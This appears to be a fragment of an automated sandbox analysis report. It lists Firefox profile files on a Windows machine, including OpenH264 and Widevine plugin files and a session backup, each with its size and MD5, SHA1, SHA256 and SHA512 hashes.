SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD54895909945e154e10e6aed3126a2742c
SHA1296c59f23ff7798903b4934cd47f940b9146e10e
SHA256f5056567435d71e0f52a52b09c66b8860db4aaefe9cb5aca8f946e12f9056ed4
SHA512cdd38c82b6b31e7a1357ca301b4d1ef884499548c3e226a771b763b228a04356e3d10eb95b0c9a779b64049afb5f0fc40a0ae8110ec57f614dd543f36c762dfa
-
Filesize
7KB
MD599149a23d4ac785256f3b2b81b1ae63f
SHA16dd67aed072f24170960f07dfbe6529cb9b0f6a4
SHA256c825368f9a450d7dc779b6f06af04a75da3746dc114afec7ff70070aded53a22
SHA5123358ec4e3a892fd9c1d45d0a420c8869fa1f1b391d15a961c6ca0456552919c90e20cf9d1fb17b0fa8b6654eb3304bf09ef5c31fff8d17b8e22dfef48449efae
-
Filesize
6KB
MD5495dff99c17433eb990241ae330e6deb
SHA14f8a03760f2b149280009d028b3cbaeb6149853b
SHA256d5172d86f421a27354f83c2d44ea1170b2cd408e11ac2cb1f36990d6807e02ab
SHA512458ea3af7595198a95d8727bfcd79803feb4da9e998d54f26ad4844049b92f9cd74ba782c2dc67da121455efa6e76867b950eaad123c190f6f98306e8db52bf0
-
Filesize
6KB
MD5c2c3ea56fc70c89191e816635f87924b
SHA11a47ffe85d28fc7f260f24f38bda2e8d26358383
SHA25603bb52bd0b68294c8b5551652b2cf7b7563a4b980620b17ea3b0bc669dfe6f73
SHA5121774dda9dd90c336e97a1714ae08db0d354eac0fcdaf0f74357596c1e42a51d3a5dd99c3838659640ee1a4f35e7e2e5e9a42715828a6e591014f89b916afb463
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5b9edab85b19e5605f0aad81476cfd2e3
SHA14a4dcadabb70a3236a0c1fae6a31473d41d74a8c
SHA25666b705327de92e0ace90653662c57a1a85f9705e3db0cc438e185d0668d8605d
SHA512a2138d0332ee04a4c5bce9f50b23a8482f057f3b5875a69e29d322905d1bd4f0b124ccb72422b439f357a2806700cb1538c404c178a06f9fc4ef73738fdefb1d
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968